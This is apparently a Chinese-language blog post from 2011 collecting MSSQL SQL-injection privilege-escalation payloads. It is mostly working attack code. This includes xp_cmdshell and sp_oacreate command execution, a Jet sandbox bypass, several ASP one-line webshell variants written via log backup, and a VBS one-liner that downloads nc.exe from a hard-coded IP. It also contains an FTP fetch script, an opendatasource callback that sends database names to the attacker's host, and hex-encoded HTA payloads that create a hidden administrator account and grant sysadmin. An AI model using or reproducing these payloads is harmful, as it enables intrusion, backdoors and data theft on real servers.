MSSQL隱碼攻擊提權的一些方法

hbu_dcf發表於2011-01-20

MSSQL隱碼攻擊提權的一些方法

MSSQL隱碼攻擊提權思路:
SA許可權:利用XP_CMDSHELL,Sp_OACreate等儲存過程直接提權.(前提儲存過程健在)
相關SQL語句
XP_CMDSHELL:
數字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字元型&搜尋型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
Sp_OACreate:
數字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
字元型&搜尋型';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
p.s.(2000系統WINDOWS改為WINNT)

沙盤提權:
開啟沙盤模式;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1--
然後利用jet.oledb執行系統命令;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c cmdline")')--
p.s.(2000系統WINDOWS改為WINNT)

直接備份一句話木馬;exec sp_makewebtask 'WEB絕對路徑/fuck.asp',' select ''<%25execute(request("a"))%25>'' ';--
P.S.(WEB與DATA在同一主機,知道WEB目錄)

下載檔案到目標主機方式:
利用NBSI等工具寫入VBS檔案
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:/c.exe^",2 >c:/labeng.vbs
該語句作用:寫一個名為labeng的VBS檔案到C盤;
接著執行CSCRIPT C:/LABENG.VBS;VBS檔案作用:下載http://125.113.114.49/nc.exe到C:/C.EXE;

FTP&TFTP傳輸:
FTP:
CMDLINE依次輸入
ECHO FTP>FTP.TXT
ECHO OPEN 125.*.*.*>>FTP.TXT
ECHO USERNAME>>FTP.TXT
ECHIO PASSWORD>>FTP.TXT
ECHO GET XX.EXE>>FTP.TXT
ECHO BYE>>FTP.TXT
作用:寫一個FTP.TXT檔案,內容為
FTP
OPEN 125.*.*.*
USERNAME
PASSWORD
GET XX.EXE
BYE
接著執行FTP -S:FTP.TXT目標主機就會到125.*.*.*下載XX.EXE;
TFTP類似~~

DB許可權:
WEB&DATA同一主機:1,列目錄找到WEB目錄,LOG或差異備份拿WEBSHELL,接著提權,2,猜表拿管理員ID和密碼,進後臺拿WEBSHELL..3,備份提權語句到啟動項,等待重起
分離的情況:1,猜表拿管理員ID和密碼,進後臺拿WEBSHELL..2,備份提權語句到啟動項,等待重起.

判斷DATA主機IP:
本地NC -L -V -P 1433 監聽1433埠
;insert into opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--

暴WEB路徑(PS:DATA&WEB同一主機)
;create table labeng(lala nvarchar(255), null)--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/',@result output insert into labeng (lala) values(@result);--
;and 1=(select count(*) from labeng where lala>1)-- 或者 ;and 1=(selet top 1 lala from labeng)--

過濾'的處理:
;DECLARE @S VARCHAR(4000);SET @S=CAST(SQL語句的十六進位制數 AS VARCHAR(4000));EXEC(@S)--

LOG備份語句:
;alter database 表 set RECOVERY FULL--
;create table cmd (a image)--
;backup log 表 to disk = 'c:/Sammy' with init--
;insert into cmd (a) values ('<%%25Execute(request("value"))%%25>')--
;backup log 表 to disk = 'WEB目錄/1.asp'--

一句話變形:
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>

備份檔案到啟動項:
將LOG備份中'<%%25Execute(request("value"))%%25>'改為HTA.BAT等檔案的十六進位制內容

例:labeng.hta
內容:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup
administrators test$ /add & del labeng.hta",0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
轉化為十六進位制:
0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A
-----------------------------------------------------------------------------
SQL語句:
;insert into cmd (a) values(0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A)--

------------------------------------------------------------------------------------
提升SQL使用者為SA許可權:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember
boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del
labeng.hta",0
</script><script language=javascript>window.close();</script>
用法同上...

相關文章